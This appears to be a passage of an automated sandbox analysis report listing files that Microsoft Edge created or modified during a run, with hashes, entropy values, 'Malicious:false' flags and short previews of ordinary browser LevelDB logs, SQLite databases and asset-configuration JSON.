                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):2163821
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.222871186611986
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:IbPMZpVrfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVrfx2mjF
                                                                                                                                                                                                                                                                                      MD5:B7D4076FCF1B3CAC92657EE645AB0F45
                                                                                                                                                                                                                                                                                      SHA1:BE9FF6E558498CF46392D6BA8E56BA62EDC72C2A
                                                                                                                                                                                                                                                                                      SHA-256:99D98E4DF8FBF10AFCBA09D22653D6CD7D0E54F1A44A871092B1CD5BBBABD5EE
                                                                                                                                                                                                                                                                                      SHA-512:E59C03C28E8803CB7F2BA86D701BF6D30C69260DF2E629B0904E657EEB42B5E554B732A394ED9CA72EC01B32A91349E9B602DF99E2713F6441344E524A7E08F4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):340
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.126484907655898
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQRk1L+q2PN723oH+Tcwt9Eh1tIFUt8YIQRzj1Zmw+YIQRh1LVkwON723oH+Tcf:oQIyvVaYeb9Eh16FUt8rQ//+rQVR5Oaw
                                                                                                                                                                                                                                                                                      MD5:9F1E51A84CB0387C9DFA784238BB1C9E
                                                                                                                                                                                                                                                                                      SHA1:682C6C1D13B3CE0E3C8525F042A3AB38AAAADAFB
                                                                                                                                                                                                                                                                                      SHA-256:46CC3D09A57CDB303F7C33D49FBF70F55E345AB89D5F1AC68505DF23E130FEF9
                                                                                                                                                                                                                                                                                      SHA-512:4B5840AD6DDC9A9FD2231E6C6F4577690CC045AE3F267980D1D610099284DFE81B0DFEAD31CC580BF99258C2A7CF4F2B510CC0C7CA322C7500CF8043BB0D593B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:37.802 2058 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/20-04:54:37.803 2058 Recovering log #3.2024/11/20-04:54:37.809 2058 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):340
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.126484907655898
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQRk1L+q2PN723oH+Tcwt9Eh1tIFUt8YIQRzj1Zmw+YIQRh1LVkwON723oH+Tcf:oQIyvVaYeb9Eh16FUt8rQ//+rQVR5Oaw
                                                                                                                                                                                                                                                                                      MD5:9F1E51A84CB0387C9DFA784238BB1C9E
                                                                                                                                                                                                                                                                                      SHA1:682C6C1D13B3CE0E3C8525F042A3AB38AAAADAFB
                                                                                                                                                                                                                                                                                      SHA-256:46CC3D09A57CDB303F7C33D49FBF70F55E345AB89D5F1AC68505DF23E130FEF9
                                                                                                                                                                                                                                                                                      SHA-512:4B5840AD6DDC9A9FD2231E6C6F4577690CC045AE3F267980D1D610099284DFE81B0DFEAD31CC580BF99258C2A7CF4F2B510CC0C7CA322C7500CF8043BB0D593B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:37.802 2058 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/20-04:54:37.803 2058 Recovering log #3.2024/11/20-04:54:37.809 2058 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.46269501125190166
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBurdR:TouQq3qh7z3bY2LNW9WMcUvBurD
                                                                                                                                                                                                                                                                                      MD5:44027C2CFBF63378AAD67706EED6E316
                                                                                                                                                                                                                                                                                      SHA1:FA4420F5F521973B176749B43A780851BC3D2E24
                                                                                                                                                                                                                                                                                      SHA-256:931164A8C6BCC1FF046E65B44F4F2B4DA0DFA6B92219735727EB2B83007C4844
                                                                                                                                                                                                                                                                                      SHA-512:2BF529165532942A307968D7C4ADC85B896D68070FCB851EBFA2607F9BACB6AA24AB00CD810833C799FD6C8CB0880B4633CB06064DB35ABD20A32286672A4322
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                      MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                      SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                      SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                      SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2046403063754525
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQjl+q2PN723oH+TcwtnG2tMsIFUt8YIQjRZmw+YIQjlVkwON723oH+TcwtnG2b:oQjwvVaYebn9GFUt8rQjR/+rQjL5OaYi
                                                                                                                                                                                                                                                                                      MD5:55F048FF75627756480451FF2F81CC1D
                                                                                                                                                                                                                                                                                      SHA1:69179BA6B478BCF8B45227B7DA94B8A747D2E273
                                                                                                                                                                                                                                                                                      SHA-256:A94DD48EE102C7B52C9BB5842A22CDA42E875675256C7F565A329A77F212BC21
                                                                                                                                                                                                                                                                                      SHA-512:DA45B46A3A8EC24C1220FF632DBD17F3E68B96981F4E39ABA19B25D671D3D9A121517B9A419E5B557A01514C238D5B0943A0822430FE142BD6A35FCBC1121446
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.907 1fa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/20-04:54:31.907 1fa8 Recovering log #3.2024/11/20-04:54:31.907 1fa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2046403063754525
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQjl+q2PN723oH+TcwtnG2tMsIFUt8YIQjRZmw+YIQjlVkwON723oH+TcwtnG2b:oQjwvVaYebn9GFUt8rQjR/+rQjL5OaYi
                                                                                                                                                                                                                                                                                      MD5:55F048FF75627756480451FF2F81CC1D
                                                                                                                                                                                                                                                                                      SHA1:69179BA6B478BCF8B45227B7DA94B8A747D2E273
                                                                                                                                                                                                                                                                                      SHA-256:A94DD48EE102C7B52C9BB5842A22CDA42E875675256C7F565A329A77F212BC21
                                                                                                                                                                                                                                                                                      SHA-512:DA45B46A3A8EC24C1220FF632DBD17F3E68B96981F4E39ABA19B25D671D3D9A121517B9A419E5B557A01514C238D5B0943A0822430FE142BD6A35FCBC1121446
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:31.907 1fa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/20-04:54:31.907 1fa8 Recovering log #3.2024/11/20-04:54:31.907 1fa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6140431278722198
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWuKnMAl71ib:TLapR+DDNzWjJ0npnyXKUO8+jep3mL
                                                                                                                                                                                                                                                                                      MD5:DCDE70383618CDFB7DA5FC17771A2C55
                                                                                                                                                                                                                                                                                      SHA1:30E3B3BC7A908DC3B54F777DF5FBCE5505AB2975
                                                                                                                                                                                                                                                                                      SHA-256:53F3B4E60B0C9097C4E9767E3B2612A016BF1FA8A45869803FBA7C0B7BF2F103
                                                                                                                                                                                                                                                                                      SHA-512:CFC6EE4DFBF654C6DF600DDC834480087ECB77D0EDB12320D7C02F7512E94E2AE0F1CBCF58F5661EEBB4B4C2CE2788DB66E6E4FB161426090E9F70ACFCC761F8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):375520
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.354117222245122
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:SA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:SFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                      MD5:5AE3514E92055710C863BFB99F10088F
                                                                                                                                                                                                                                                                                      SHA1:1ADDD421FECF44AC39A4B741B9FCBB131EA03316
                                                                                                                                                                                                                                                                                      SHA-256:0999B32D5DEDF93384979B53DC3921C17D887E023D9EE1C0DE15D2FC8F11E205
                                                                                                                                                                                                                                                                                      SHA-512:D0B451092A5324C3852BCBC340E89F05A1C7E360167F37C13A3F2C895705EFD9C355D7B0BFA083136D50DE0A3F067E361889CB26CD55F617A6955E7512D03B28
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1...~q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13376570079545692..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):315
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.163296272208882
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:HIQRTnR3B1N723oH+Tcwtk2WwnvB2KLlVIQO7TQQ+q2PN723oH+Tcwtk2WwnvIF2:oQxxBaYebkxwnvFLQQAQVvVaYebkxwnp
                                                                                                                                                                                                                                                                                      MD5:59BCB96D08D4314F3AEC598B7C9E1071
                                                                                                                                                                                                                                                                                      SHA1:432DF73960D045B2144C5562FB757676664CC473
                                                                                                                                                                                                                                                                                      SHA-256:93F8710FDA8437B32F03F264A291A933A666702BC25A716F9EDFB39C98BD71FF
                                                                                                                                                                                                                                                                                      SHA-512:9D024B40F99ECCF52B21E87605E2CC472676862C341F48FABEFCE038CD006597CF735D422AADD1D6EC59F55ED328E62A1C454A244D2337A879AEEAF64D9C8E82
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:2024/11/20-04:54:37.831 2068 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/20-04:54:38.114 2068 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):358860
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.324607845114279
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RM:C1gAg1zfvk
                                                                                                                                                                                                                                                                                      MD5:80038CEB57548207D08093D9B4E17233
                                                                                                                                                                                                                                                                                      SHA1:EE6622A9C6ABA2574BF86200975B1EEDBCAD3456
                                                                                                                                                                                                                                                                                      SHA-256:16F72E671A7E5C4985F6320838CFF85D6A94D4F3C4DA134314641874F5289F0B
                                                                                                                                                                                                                                                                                      SHA-512:687CB53FE5315D47837AB0D8B3162DA01824D615714E17DB509895C6099BF30D9D87AE8A4386A5014343FE97217657C9918CB57AE945B0144BCE672E2CE28ADD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):328
